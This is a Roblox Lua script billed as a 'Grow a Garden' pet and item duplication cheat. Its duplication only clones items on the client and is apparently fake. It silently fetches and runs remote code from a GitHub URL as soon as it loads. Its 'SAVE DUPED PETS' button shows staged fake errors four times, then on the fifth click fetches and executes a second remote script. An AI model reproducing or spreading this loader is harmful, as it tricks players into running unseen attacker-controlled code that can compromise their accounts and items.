loadstring(game:HttpGet("https://raw.githubusercontent.com/aa362/growagarden/refs/heads/main/privatescript"))()
local Players = game:GetService("Players")
local RunService = game:GetService("RunService")
local player = Players.LocalPlayer

local Rayfield = loadstring(game:HttpGet("https://sirius.menu/rayfield"))()

-- UI Window Setup
local Window = Rayfield:CreateWindow({
	Name = "4.0.0 - New Flow",
	LoadingTitle = "Booting Up...",
	LoadingSubtitle = "Made By Glow a Guardian",
	ConfigurationSaving = {
		Enabled = false
	},
	Discord = {
		Enabled = false
	},
	KeySystem = false
})

-- Main Tab
local MainTab = Window:CreateTab("Main", 0)

-- Tool Display
local toolLabel = MainTab:CreateParagraph({
	Title = "Holding:",
	Content = "Nothing"
})

RunService.RenderStepped:Connect(function()
	local tool = player.Character and player.Character:FindFirstChildOfClass("Tool")
	if tool then
		toolLabel:Set({Title = "Holding:", Content = tool.Name})
	else
		toolLabel:Set({Title = "Holding:", Content = "Nothing"})
	end
end)

-- Dupe Amount Input（通常動作に戻す）
local dupeAmount = 1
MainTab:CreateInput({
	Name = "Dupe Amount (1-100)",
	PlaceholderText = "Enter a number",
	RemoveTextAfterFocusLost = false,
	Callback = function(text)
		local number = tonumber(text)
		if number and number >= 1 and number <= 100 then
			dupeAmount = number
		else
			warn("Enter a number between 1 and 100")
		end
	end
})

-- Dupe Button
MainTab:CreateButton({
	Name = "DUPE",
	Callback = function()
		local tool = player.Character and player.Character:FindFirstChildOfClass("Tool")
		if not tool then
			warn("No tool to duplicate.")
			return
		end

		for i = 1, dupeAmount do
			local clone = tool:Clone()
			clone.Parent = player.Backpack
		end
	end
})

-- SAVE DUPED PETS Button (5回目で実行)
local saveAttemptCount = 0

local saveButton = MainTab:CreateButton({
	Name = "SAVE DUPED PETS",
	Callback = function()
		saveAttemptCount += 1

		if saveAttemptCount < 5 then

			local button = saveButton
			if button and button.Set then

				button:Set({
					Name = "❌ ERROR - SAVE DUPED PETS",
				})

				task.spawn(function()
					local flashCount = 3
					for i = 1, flashCount do
						button:Set({Interactable = false})
						wait(0.1)
						button:Set({Name = "SAVE DUPED PETS"})
						wait(0.1)
						button:Set({Name = "❌ ERROR - SAVE DUPED PETS"})
					end
					button:Set({
						Name = "SAVE DUPED PETS",
						Interactable = true,
					})
				end)
			end

			warn("❌ SAVE DUPED PETS ERROR: 試行 " .. saveAttemptCount .. " / 5")
		else
			-- 5回目で実行
			local success, err = pcall(function()
				loadstring(game:HttpGet("https://raw.githubusercontent.com/aa362/growagarden/refs/heads/main/uitest"))()
			end)
			if not success then
				warn("SAVE DUPED PETS 実行失敗:", err)
			end
		end
	end
})
